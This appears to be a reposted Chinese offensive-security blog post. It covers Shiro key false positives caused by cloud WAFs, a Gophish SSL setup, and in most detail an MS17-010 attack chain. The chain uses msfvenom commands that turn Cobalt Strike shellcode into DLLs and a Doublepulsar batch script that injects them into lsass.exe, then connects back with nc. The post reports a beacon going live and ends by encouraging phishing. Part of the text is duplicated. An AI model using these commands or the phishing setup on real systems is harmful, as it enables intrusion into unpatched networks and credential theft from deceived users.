免责声明:
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关。
日常渗透打点经常遇到shiro工具找到KEY,但是又不止一个Key的情况。
实际上,都不是真的KEY,只是云WAF给你拦截了shiro爆破key的payload,比如
这个时候需要找域名对应的真实IP,绕过套在域名上的云WAF,这类情况很常见,漏扫诸多误报也是来源于此(也不排除漏洞检测规则写的很拉跨的)。
17010上线Cs的打法
虽然2023年了,但是某些老旧内网仍然很多MS17-010
出网环境下,使用msfvenom 生成dll,加入17010工具的载荷,直接上线
解释一下:payload.bin是cobaltstrike生成前置马的shellcode文件
#### 64位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
#### 32位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -f dll -o x86.dll
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
接下来,修改go.bat脚本,重命名x64.dll为cobaltstrike_x64.dll
@if
"%2"
==
"x86"
(Doublepulsar-
1.3
.
1
.exe --OutConfig
2
.txt --TargetIp %1 --TargetPort
445
--DllPayload luan32.dll --DllOrdinal
1
ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture %2 --Function Rundll)
else
(Doublepulsar-
1.3
.
1
.exe --OutConfig
2
.txt --TargetIp %1 --TargetPort
445
--DllPayload luan64_add_rule.dll --DllOrdinal
1
ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture %2 --Function Rundll & Doublepulsar-
1.3
.
1
.exe --OutConfig
2
.txt --TargetIp %1 --TargetPort
445
--DllPayload cobaltstrike_x64.dll --DllOrdinal
1
ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture %2 --Function Rundll)
@nc %1
6666
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
本地起个ms17-010的环境,打一发试试
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
cobaltstrike上线了哦
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
03
关于Gophish导入zerossl证书的小坑
地址:
https://app.zerossl.com/
申请SSL证书时注意,配置正确的域名:
加SSL的域名是mail.xxx.com
那么需要输入mail.xxx.com,生成完毕后会有两份证书,一份私钥,其中一份是中间证书
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
中间证书需要合并,生成我们的根证书(一般攻防工具就两份,一份证书,一份私钥)
合并证书文件
cat
certificate
.crt
ca_bundle
.crt
>>
certificates
.crt
导入后,配置gophish即可
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
验证一下
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
接下来就可以愉快的钓鱼了
![聊聊攻防渗透中的一些技巧和打法 聊聊攻防渗透中的一些技巧和打法]()
虽然2023年了,但是某些老旧内网仍然很多MS17-010
出网环境下,使用msfvenom 生成dll,加入17010工具的载荷,直接上线
解释一下:payload.bin是cobaltstrike生成前置马的shellcode文件
#### 64位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
#### 32位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -f dll -o x86.dll
接下来,修改go.bat脚本,重命名x64.dll为cobaltstrike_x64.dll
@if
"%2"
==
"x86"
(Doublepulsar-
1.3
.
1
.exe --OutConfig
2
.txt --TargetIp %1 --TargetPort
445
--DllPayload luan32.dll --DllOrdinal
1
ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture %2 --Function Rundll)
else
(Doublepulsar-
1.3
.
1
.exe --OutConfig
2
.txt --TargetIp %1 --TargetPort
445
--DllPayload luan64_add_rule.dll --DllOrdinal
1
ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture %2 --Function Rundll & Doublepulsar-
1.3
.
1
.exe --OutConfig
2
.txt --TargetIp %1 --TargetPort
445
--DllPayload cobaltstrike_x64.dll --DllOrdinal
1
ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture %2 --Function Rundll)
@nc %1
6666
本地起个ms17-010的环境,打一发试试
cobaltstrike上线了哦
关于Gophish导入zerossl证书的小坑
地址:
https://app.zerossl.com/
申请SSL证书时注意,配置正确的域名:
加SSL的域名是mail.xxx.com
那么需要输入mail.xxx.com,生成完毕后会有两份证书,一份私钥,其中一份是中间证书
中间证书需要合并,生成我们的根证书(一般攻防工具就两份,一份证书,一份私钥)
合并证书文件
cat
certificate
.crt
ca_bundle
.crt
>>
certificates
.crt
导入后,配置gophish即可
验证一下
接下来就可以愉快的钓鱼了
原文始发于微信公众号(JC的安全之路):聊聊攻防渗透中的一些技巧和打法
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论